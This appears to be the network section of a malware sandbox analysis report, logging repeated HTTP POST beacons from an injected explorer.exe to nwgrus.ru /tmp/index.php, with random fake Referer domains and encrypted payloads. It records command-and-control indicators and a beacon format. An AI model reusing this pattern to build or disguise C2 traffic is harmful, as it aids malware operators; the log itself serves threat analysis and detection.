                                      Oct 13, 2024 18:27:49.911564112 CEST226OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2d 2f cc f5
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu-/lE`y;^")q3qTP9)$P^@Df}U%J}cHHlHBRjyqTw)7
                                      Oct 13, 2024 18:27:50.853787899 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.464974148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:50.863857985 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://yvuudhqxndfwr.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 234
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:50.863874912 CEST234OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 35 5e f1 ad
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu5^irF!Oz~jx*X=u$[@u]$Be::Yw}Tc7<7](. mBzvIX0
                                      Oct 13, 2024 18:27:51.826019049 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.464975148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:51.835762024 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://fgueognrgcdryprb.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 241
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:51.835762978 CEST241OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 5e 32 d3 81
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu^25qK*Zg2c<RA*Z4v?'R'Mj0F)PbR7n-N([rcbP=:Dk]Gz
                                      Oct 13, 2024 18:27:52.776384115 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.464976148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:52.789835930 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://hvywquxnrrbp.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 347
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:52.789871931 CEST347OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 59 1e e7 f4
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuYn@sXDfcEc4e5^;+KF'>\)o_>UvGYK{gJ{Pu"FT3#F|bpVwU_u]t<>=5
                                      Oct 13, 2024 18:27:53.737190962 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.464977148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:53.747736931 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://cacpihwweubtsxg.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 238
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:53.747826099 CEST238OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 45 b9 e0
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu5E;]kmEb3WX%;Cq{|I~KZ@DvQEt.KE$HpTsjYH!|rUGU'blr)8n
                                      Oct 13, 2024 18:27:54.709198952 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:54 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.464978148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:54.720984936 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://rqcdsrhbxdj.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 340
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:54.720984936 CEST340OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 43 1b a7 92
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuC3SEux+Pk gdH=p4 Lbg@MjV*/e_SZ;epEQE"0?;~".s[-][@
                                      Oct 13, 2024 18:27:55.663595915 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:55 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.464979148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:55.673388004 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://llagbnlopmmumxog.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 337
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:55.673423052 CEST337OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3b 52 d7 86
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu;Rb:mB]u%EAp['p2"1#i$M$SdgB^h/@>Wjo"[+MP7Z$&X|H._-L;
                                      Oct 13, 2024 18:27:56.622756004 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.464981148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:56.633893013 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kdhqngbaswv.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 293
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:56.633893013 CEST293OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5e 31 ea e3
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu^1^*wCVinrZz2{Mo,r':F+dPzqf='_h\`u;J ,U-yWU:g>K002
                                      Oct 13, 2024 18:27:57.589418888 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.464987148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:57.600322008 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ttjnxnssovi.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 305
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:57.600322008 CEST305OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2f 4e a0 8d
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu/NpjCJ?TgQs0/:>DC}HMn%_/-a}hI nrJJMC%@/(w/yBxyoZ]2b)[A
                                      Oct 13, 2024 18:27:58.543081999 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:58 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.464993148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:58.552355051 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://mxvsopepyhexw.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 277
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:58.552355051 CEST277OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 42 4e dd fd
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuBNZj@{33JMOjvZuK.^\L4jmVC$<n!B-~/!_#2'?%lRy }Pf~VY-
                                      Oct 13, 2024 18:27:59.554004908 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:59 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.464999148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:59.576095104 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://icsnyxejpjswt.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 311
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:59.576131105 CEST311OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 71 14 d0 f5
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuqszsb7|Z'?=L3uQaQ=W5 (rb> tzHZi<]}81=f0x|Yy FzOv~#JH
                                      Oct 13, 2024 18:28:00.520693064 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:00 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.465005148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:00.531119108 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ofymhpccvbs.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 143
                                      Host: nwgrus.ru
